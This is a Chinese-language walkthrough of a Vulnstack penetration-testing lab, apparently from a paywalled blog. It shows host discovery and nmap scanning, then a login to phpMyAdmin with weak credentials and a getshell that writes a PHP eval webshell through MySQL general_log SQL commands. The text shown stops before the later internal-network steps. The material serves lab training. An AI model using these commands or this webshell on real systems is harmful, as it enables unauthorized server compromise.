前期准备:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/下载虚拟机
配置环境需要两张仅主机模式开启的网卡


构造这样的内网环境,Kali和Win7的外网IP处于同一网段,可以进行攻击,而Win7还有内网网段,通过拿下Win7机器继续攻击其处于内网同一网段的Win2003及其域控服务器。
首先登录Win7开启phpstudy,登陆密码hongrisec@2019,所有虚拟机密码都是这个。
复现:
因为在kali和win7在同一网段,所以可以使用netdiscover对主机IP进行探测

探测到129存在,应该就是目标Win7主机,对目标主机端口开放情况进行探测
nmap -sC -sV -Pn -p 1-65535 192.168.136.129
发现存在80端口开放,访问看到phpStudy探针页面,直接猜测佩戴了phpmyadmin,随即访问,猜测弱口令root/root登陆上去

接下来利用日志文件Getshell,参看我之前写的PHPMyadmin getshell到提权文章
show variables like ‘%general%’; #查看日志状态
SET GLOBAL general_log=’on’ ;#开启写日志记录
SET GLOBAL general_log_file=’C:/phpStudy/www/233.php’ ;#更改日志文件目录

写入一句话 SELECT ‘<?php eval($_POST[“cmd”]);?>’ ;蚁剑连接

这就拿到Win7机器的权限了,接下来就是进行对内网信息收集的过程了

本文介绍了如何利用Vulnstack进行红队攻击实践,包括前期准备、主机探测、端口扫描、利用phpmyadmin弱口令Getshell、内网信息收集、权限提升、域控探测以及横向移动。通过CS和Ladon工具,展示了在Windows环境中进行内网渗透的步骤和技术。
最低0.47元/天 解锁文章
3168

被折叠的 条评论
为什么被折叠?



